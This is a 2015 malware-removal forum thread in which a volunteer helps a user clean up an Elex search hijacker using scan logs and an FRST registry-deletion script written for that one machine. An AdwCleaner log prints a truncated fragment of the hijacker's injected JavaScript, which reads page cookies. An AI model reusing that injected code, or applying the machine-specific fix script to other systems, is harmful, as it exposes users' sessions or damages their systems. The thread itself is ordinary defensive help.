WE'RE SURE THAT YOU'LL LOVE US!

Hey there! :wub: Looks like you're enjoying the discussion, but you're not signed up for an account. When you create an account, we remember exactly what you've read, so you always come right back where you left off. You also get notifications, here and via email, whenever new posts are made. You can like posts to share the love. Join 93116 other members! Anybody can ask, anybody can answer. Consistently helpful members may be invited to become staff. Here's how it works. Virus cleanup? Start here -> Malware Removal Forum.

Try What the Tech -- It's free!

Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Antivirus definitions are not getting updated! [Solved]

Started by vijay.gupta , Feb 10 2015 12:58 AM

antivirus update smart search

This topic is locked

19 replies to this topic

#1 vijay.gupta

Silver Member

Authentic Member
400 posts

Posted 10 February 2015 - 12:58 AM

Hi,

Somehow, my machine was infected with Elex Smart Search malware as a result of which start pages of IE, Firefox and Chrome changed and also, Symantec Antivirus started showing that AntiVirus definitions are not up to date. When I tried to run LiveUpdate, it runs fine and says session is complete but antivirus still showed "AntiVirus definitions are not up to date". So, I googled and find the following link:

http://www.malwarere...l-instructions/

I followed all the instructions and many infections were removed, however, antivirus still says "AntiVirus definitions are not up to date". Now, it seems that something else is also happening in my system which requires Investigation.

I tried all the steps that you have asked before posting here on the following link:

http://forums.whatth...howtopic=106388

Please find attached the required files.

Thanks,

Vijay Gupta

Attached Files

aswMBR.txt 2.82KB 390 downloads
Addition.txt 35.04KB 442 downloads
FRST.txt 41.25KB 670 downloads
FRST.txt 41.25KB 346 downloads

Advertisements

Register to Remove

#2 OCD

SuperHelper

Malware Team
5,574 posts

Posted 10 February 2015 - 07:24 PM

Hi vijay.gupta,

My name is OCD. I would be more than happy to take a look at your log and help you with solving any malware problems you might have. Logs can take a while to research, so please be patient and know that I am working hard to get you a clean and functional system back in your hands. I'd be grateful if you would note the following:

I will be working on your Malware issues, this may or may not, solve other issues you have with your machine.
The fixes are specific to your problem and should only be used for the issues on this machine.
Please continue to review my answers until I tell you your machine appears to be clear. Absence of symptoms does not mean that everything is clear.
It's often worth reading through these instructions and printing them for ease of reference.
If you don't know or understand something, please don't hesitate to say or ask!! It's better to be sure and safe than sorry.
Please reply to this thread. Do not start a new topic.
Copy and Paste logs directly into the reply window. DO NOT attach the logs unless specifically instructed to do so.

IMPORTANT NOTE : Please do not delete, download or install anything unless instructed to do so.

DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your system inoperable and could require a full reinstall of your Operating System and losing all your programs and data.

Please stay with this topic until I let you know that your system appears to be "All Clear"

Important: All tools MUST be run from the Desktop.

=========================

What version of Symantec Antivirus are you running, and what definitions version is currently installed?

=========================

P2P - (Peer to Peer)

I see you have/had P2P software uTorrent installed on your machine. We are not here to pass judgment on file-sharing as a concept. However, we will warn you that engaging in this activity and having this kind of software installed on your machine will always make you more susceptible to re-infections and possibly Identity Theft. It likely contributed to your current situation. This page will give you further information.

Please note: Even if you are using a "safe" P2P program, it is only the program that is safe. You will be sharing files from uncertified sources, and these are often infected. The bad guys use P2P filesharing as a major conduit to spread their wares.

I would strongly recommend that you uninstall this now.

Click Start > Control Panel > Programs and Features. Locate and select the following that are present on the list and click the Remove button:

uTorrent

If you choose to not remove this programs please refrain from using it until we have finished cleaning your computer.

=========================

Security Check

Download Security Check by screen317 from here or here.

Save it to your Desktop.
- Windows XP : Double click on the icon to run it.
- Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
A Notepad document should open automatically called checkup.txt; please post the contents of that document.

=========================

Please download AdwCleaner by Xplode and save to your Desktop.

- Windows XP : Double click on the icon to run it.
- Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
Click on the Scan button.
AdwCleaner will begin...be patient as the scan may take some time to complete.
After the scan has finished, click on the Report button...a log file (AdwCleaner[R0].txt) will open in Notepad for review.
The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it. If you see an entry you want to keep, let me know about it.
Copy and paste the contents of that log file in your next reply.
A copy of all log files are saved in the C:\AdwCleaner folder which was created when running the tool.

=========================

FRST Fix Script

Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad. Save it on the desktop as fixlist.txt

Start
CloseProcesses:
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: G - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: H - H:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: I - I:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad399b3-408c-11e4-80a4-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad399db-408c-11e4-80a4-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad39c25-408c-11e4-80a4-00247eb188db} - G:\Windows/AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {1d830ad5-a71b-11e4-bb6a-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {35e1f900-af55-11e4-a197-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {57b233e9-f843-11e3-b35c-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {57b233ea-f843-11e3-b35c-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {9ececd09-f473-11e3-bf20-00247eb188db} - I:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {d1e8a766-a907-11e4-870d-00247eb188db} - H:\setup_vmb_lite.exe /checkApplicationPresence
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
EmptyTemp:
End

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST and press the Fix button just once and wait.
The tool will make a log (Fixlog.txt) please post it to your reply.

=========================

Re-run Farbar Recovery Scan Tool it should be on your desktop.

- Windows XP : Double click on the icon to run it.
- Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
When the tool opens click Yes to disclaimer.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.

=========================

In your next post please provide the following:

checkup.txt
AdwCleaner[R0].txt
Fixlog.txt
new FRST.txt

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days

If you are satisfied with the help you have received, please consider making a donation.

#3 vijay.gupta

Silver Member

Authentic Member
400 posts

Posted 11 February 2015 - 12:42 AM

Checkup.txt

Results of screen317's Security Check version 0.99.96
Windows 7 Service Pack 1 x86 (UAC is enabled)
Internet Explorer 11
``````````````Antivirus/Firewall Check:``````````````
Windows Firewall Enabled!
Symantec Endpoint Protection
WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
Ad-Aware
CCleaner
Java 7 Update 60
Java SE Development Kit 7 Update 60
Java version 32-bit out of Date!
Adobe Flash Player 10 Flash Player out of Date!
Java 64-bit 8 Update 31
Adobe Flash Player 16.0.0.305
Adobe Reader 9 Adobe Reader out of Date!
Mozilla Firefox 31.0 Firefox out of Date!
Google Chrome (40.0.2214.111)
````````Process Check: objlist.exe by Laurent````````
Norton ccSvcHst.exe
Ad-Aware AAWService.exe
Ad-Aware AAWTray.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C: 0%
````````````````````End of Log``````````````````````

AdwCleaner[R0]:

# AdwCleaner v4.110 - Logfile created 11/02/2015 at 11:46:34
# Updated 05/02/2015 by Xplode
# Database : 2015-02-09.1 [Server]
# Operating system : Windows 7 Home Basic Service Pack 1 (x86)
# Username : VIJAY - VIJAY-PC
# Running from : C:\Users\VIJAY\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Scheduled tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17496

-\\ Mozilla Firefox v31.0 (x86 en-US)

[agyg75sl.default] - Line Found : user_pref("extensions.dGngmy3KVsGqkpGt.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"rjrErTwEqdw5qTnEpja7rdY9qHk\")>-1||url.indexOf(\"acebook\")>-[...]

-\\ Google Chrome v

*************************

AdwCleaner[R0].txt - [877 bytes] - [11/02/2015 11:46:34]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [935 bytes] ##########

Fixlog.txt

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 08-02-2015
Ran by VIJAY at 2015-02-11 11:54:45 Run:1
Running from C:\Users\VIJAY\Desktop
Loaded Profiles: VIJAY (Available profiles: VIJAY)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
Start
CloseProcesses:
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: G - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: H - H:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: I - I:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad399b3-408c-11e4-80a4-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad399db-408c-11e4-80a4-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {0ad39c25-408c-11e4-80a4-00247eb188db} - G:\Windows/AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {1d830ad5-a71b-11e4-bb6a-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {35e1f900-af55-11e4-a197-00247eb188db} - G:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {57b233e9-f843-11e3-b35c-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {57b233ea-f843-11e3-b35c-00247eb188db} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {9ececd09-f473-11e3-bf20-00247eb188db} - I:\AutoRun.exe
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\MountPoints2: {d1e8a766-a907-11e4-870d-00247eb188db} - H:\setup_vmb_lite.exe /checkApplicationPresence
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
EmptyTemp:
End
*****************

Processes closed successfully.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\G" => Key deleted successfully.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\H" => Key deleted successfully.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\I" => Key deleted successfully.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0ad399b3-408c-11e4-80a4-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{0ad399b3-408c-11e4-80a4-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0ad399db-408c-11e4-80a4-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{0ad399db-408c-11e4-80a4-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0ad39c25-408c-11e4-80a4-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{0ad39c25-408c-11e4-80a4-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1d830ad5-a71b-11e4-bb6a-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{1d830ad5-a71b-11e4-bb6a-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{35e1f900-af55-11e4-a197-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{35e1f900-af55-11e4-a197-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{57b233e9-f843-11e3-b35c-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{57b233e9-f843-11e3-b35c-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{57b233ea-f843-11e3-b35c-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{57b233ea-f843-11e3-b35c-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{9ececd09-f473-11e3-bf20-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{9ececd09-f473-11e3-bf20-00247eb188db} => Key not found.
"HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d1e8a766-a907-11e4-870d-00247eb188db}" => Key deleted successfully.
HKCR\CLSID\{d1e8a766-a907-11e4-870d-00247eb188db} => Key not found.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
EmptyTemp: => Removed 721.4 MB temporary data.

The system needed a reboot.

==== End of Fixlog 11:55:48 ====

FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 08-02-2015
Ran by VIJAY (administrator) on VIJAY-PC on 11-02-2015 12:04:56
Running from C:\Users\VIJAY\Desktop
Loaded Profiles: VIJAY (Available profiles: VIJAY)
Platform: Microsoft Windows 7 Home Basic Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_9691412ff1876250\stacsv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Symantec Corporation) C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
(Lavasoft) C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\SmcGui.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_9691412ff1876250\AEstSrv.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
() C:\ProgramData\DatacardService\HWDeviceService.exe
(Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
() C:\Program Files\CyberLink\Shared files\RichVideo.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe
(Check Point Software Technologies) C:\Program Files\CheckPoint\Endpoint Connect\TracSrvWrapper.exe
() C:\Program Files\Reliance 3G\AssistantServices.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Vodafone) C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(CyberLink Corp.) C:\Program Files\Hp\QuickPlay\QPService.exe
( Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Hewlett-Packard) C:\Program Files\Hp\HP Software Update\hpwuschd2.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
(Check Point Software Technologies) C:\Program Files\CheckPoint\Endpoint Connect\TrGUI.exe
(Lavasoft) C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
(Symantec Corporation) C:\Program Files\Common Files\Symantec Shared\ccApp.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray.exe
() C:\Program Files\Reliance 3G\UIExec.exe
() C:\Q4SearchInstall\bin\Q4Search.exe
(Vodafone) C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe
(Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\Shared\hpqWmiEx.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Google Inc.) C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\GoogleCrashHandler.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
() C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Service.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(Adobe Systems, Inc.) C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_16_0_0_305.exe
(Adobe Systems, Inc.) C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_16_0_0_305.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [282624 2009-05-15] (Alps Electric Co., Ltd.)
HKLM\...\Run: [QPService] => C:\Program Files\HP\QuickPlay\QPService.exe [468264 2009-06-24] (CyberLink Corp.)
HKLM\...\Run: [UCam_Menu] => C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe [218408 2009-02-18] (CyberLink Corp.)
HKLM\...\Run: [QlbCtrl.exe] => C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [320056 2009-06-25] ( Hewlett-Packard Development Company, L.P.)
HKLM\...\Run: [UpdatePRCShortCut] => C:\Program Files\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [35696 2009-02-28] (Adobe Systems Incorporated)
HKLM\...\Run: [HP Software Update] => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [54576 2008-12-09] (Hewlett-Packard)
HKLM\...\Run: [WirelessAssistant] => C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [498744 2009-07-23] (Hewlett-Packard)
HKLM\...\Run: [Check Point Endpoint Security] => C:\Program Files\CheckPoint\Endpoint Connect\TrGUI.exe [801968 2011-09-14] (Check Point Software Technologies)
HKLM\...\Run: [ccApp] => C:\Program Files\Common Files\Symantec Shared\ccApp.exe [115624 2013-09-04] (Symantec Corporation)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray.exe [495708 2010-03-23] (IDT, Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => "C:\Program Files\Java\jre7\bin\jusched.exe"
HKLM\...\Run: [NvBackend] => C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe [2403104 2014-07-25] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [UIExec] => C:\Program Files\Reliance 3G\UIExec.exe [157000 2012-11-26] ()
HKLM\...\Run: [Q4Search Assistance Client] => C:\Q4SearchInstall\bin\Q4Search.exe [5164792 2014-09-27] ()
HKLM\...\Run: [MobileBroadband] => C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe [279552 2011-06-28] (Vodafone)
HKLM\...\Run: [Ad-Watch] => C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe [506712 2009-01-19] (Lavasoft)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-12-16] (Hewlett-Packard)
HKU\S-1-5-19\...\RunOnce: [] => [X]
HKU\S-1-5-20\...\RunOnce: [] => [X]
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Run: [LightScribe Control Panel] => C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe [2363392 2009-06-18] (Hewlett-Packard Company)
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Run: [Google Update] => C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2014-08-09] (Google Inc.)
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Policies\system: [WallpaperStyle] 2
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Policies\system: [EnableLUA] 1
HKU\S-1-5-21-1443430433-3504582150-3450442512-1000\...\Policies\Explorer: [NofolderOptions] 0
HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2
HKU\S-1-5-18\...\Policies\system: [EnableLUA] 1
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\VIJAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\S5830i_Modem_Files.zip.lnk
ShortcutTarget: S5830i_Modem_Files.zip.lnk -> C:\ProgramData\{31d2e005-3d7a-7eda-31d2-2e0053d78014}\S5830i_Modem_Files.zip.exe (No File)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.symantec....ponse/index.jsp
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.symantec....ponse/index.jsp
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab
DPF: {CAFEEFAC-0017-0000-0065-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL (Microsoft Corporation)
Tcpip\..\Interfaces\{DF8F4EFA-845F-4DAC-9766-DA2114A623BE}: [NameServer] 203.187.192.15 203.187.242.6

FireFox:
========
FF ProfilePath: C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF Plugin: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~4\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.1.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin HKU\S-1-5-21-1443430433-3504582150-3450442512-1000: @talk.google.com/GoogleTalkPlugin -> C:\Users\VIJAY\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKU\S-1-5-21-1443430433-3504582150-3450442512-1000: @talk.google.com/O1DPlugin -> C:\Users\VIJAY\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKU\S-1-5-21-1443430433-3504582150-3450442512-1000: @tools.google.com/Google Update;version=3 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
